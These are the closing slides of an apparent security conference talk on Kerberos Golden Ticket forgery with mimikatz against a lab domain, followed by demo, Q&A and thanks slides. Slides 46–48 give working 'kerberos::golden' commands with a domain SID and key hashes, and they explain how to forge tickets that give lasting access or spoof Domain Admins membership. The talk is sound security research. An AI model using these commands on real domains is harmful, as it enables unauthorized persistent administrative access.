  • 46. • Client name : Administrateur • Service name : krbtgt/chocolate.local • Validity – Start Time 07/08/2014 12:05:00 – End Time 07/08/2024 12:05:00 • … • Authorization data Microsoft (PAC) – Username : Administrateur – Domain SID • S-1-5-21-130452501-2365100805-3685010670 – User ID • 500 Administrateur – Groups ID • 512 Admins du domaine • 519 Administrateurs de l’entreprise • 518 Administrateurs du schéma • … – … Kerberos :: Golden Ticket
  • 47. • Be crazy =) – We want to have a long time access to a share limited to a user “utilisateur”, disabled. • kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:srvcharly$ <= real account always in good state /id:1001 <= RID of the real account /groups:513,1107 <= RID of “utilisateur” account, yep, in groups =) /ticket:fake_utilisateur.kirbi Kerberos :: Golden Ticket
  • 48. • Be funky =) • kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /rc4:310b643c5316c8c3c70a10cfb17e2e31 /user:badguy /id:0xffffffff /groups:513,512,520,518,519 /ticket:badguy.kirbi • Yep, both the USER and the ID don’t exist, so this TGT will only work for 20 mins (TGS watchdog) – It works if an ACL is defined with groups (this one spoofs a user in domain admins group; 512) – …but all TGS obtained in this 20 mins will be valid 10h ;) – …and you can make multiple TGT… Kerberos :: Golden Ticket
  • 49. ~ demo ! ~
  • 50. Sorry, it was the last demo ;)
  • 51. ~ Questions? ~ (if not enough time, come see us!)
  • 52. • You! To come listen us! – And trying to understand Benjamin ;) – If you are shy : exorcyst{put here @}gmail.com & benjamin{put here @}gentilkiwi.com • My co-speaker - he will recognize himself ;) • Blackhat staff ! • Microsoft – They give us a lot’s of subject for slides! – For a few years, they have worked hard to enhance a lots of things in security (and it’s not easy to mix security with retro compatibility) • Security community (sorry, we have both a big list) – Come see us for beer-time & stickers :P Thank you all !